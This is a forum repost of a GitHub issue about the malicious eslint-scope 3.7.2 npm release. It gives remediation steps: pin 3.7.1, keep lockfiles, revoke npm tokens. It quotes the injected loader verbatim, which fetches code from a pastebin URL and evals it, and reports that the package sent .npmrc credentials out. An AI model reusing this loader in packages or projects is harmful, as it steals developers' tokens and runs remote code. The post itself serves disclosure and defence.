I came across this issue and figured I shared it here.
Virus in eslint-scope? #39
https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes
Updated blog post:Update from the maintainers
Incident status report from npm
Please follow the comment by @platinumazure that gives a little insight into what happened: https://github.com/eslint/eslint-scope/issues/39#issuecomment-404533026
It also appears that the same code was published in eslint-config-eslint@5.0.2, which has also since been unpublished. See https://github.com/eslint/eslint/issues/10600 for more information.
In the meantime
- Pin the version of
eslint-scope
to3.7.1
, one way is to add theresolutions
to yourpackage.json
"resolutions": {
"eslint-scope": "3.7.1"
}
Verify the dependency version with yarn list eslint-scope
. It should print out eslint-scope@3.7.1
-
Use
package-lock.json
oryarn.lock
and have it in your repo if possible. Do not upgrade to 3.7.2 even ifyarn outdated
shows that there is a new version available. -
Revoke your NPM token as suggested in the comment below https://github.com/eslint/eslint-scope/issues/39#issuecomment-404496856. You can do the same by logging in to https://www.npmjs.com/, selecting the "tokens" menu from the account dropdown and removing all tokens listed on the page. Make sure to recreate the relevant tokens if you hook your NPM to external services.
The issue
I don't know what the hell this is but it looks like a virus to me:
[2/3] ⠠ eslint-scope
error /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope: Command failed.
Exit code: 1
Command: node ./lib/build.js
Arguments:
Directory: /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope
Output:
undefined:30
https1.get({hostname:'sstatic1.histats.com',path:'/0.gif?4103075&101',method:'GET',headers:{Referer:'http://1.a/'+conten
^^^^^^
SyntaxError: Unexpected end of input
at IncomingMessage.r.on (/Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope/lib/build.js:6:10)
at emitOne (events.js:116:13)
at IncomingMessage.emit (events.js:211:7)
at IncomingMessage.Readable.read (_stream_readable.js:475:10)
at flow (_stream_readable.js:846:34)
at resume_ (_stream_readable.js:828:3)
at _combinedTickCallback (internal/process/next_tick.js:138:11)
The contents of a suspicious file:
try{
var https=require('https');
https.get({'hostname':'pastebin.com',path:'/raw/XLeVP82h',headers:{'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',Accept:'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}},(r)=>{
r.setEncoding('utf8');
r.on('data',(c)=>{
eval(c);
});
r.on('error',()=>{});
}).on('error',()=>{});
}catch(e){}
The URL it attempts to load is http://pastebin.com/raw/XLeVP82h
Also it attempts to send my .npmrc
somewhere.
This is version 3.7.2 that's been published an hour ago.
package managers are a surprising medium to spread viruses, especially when the virus is latched onto a dependency of babel-eslint
😱
Top comments (1)
Not exactly a virus but an exfiltration tool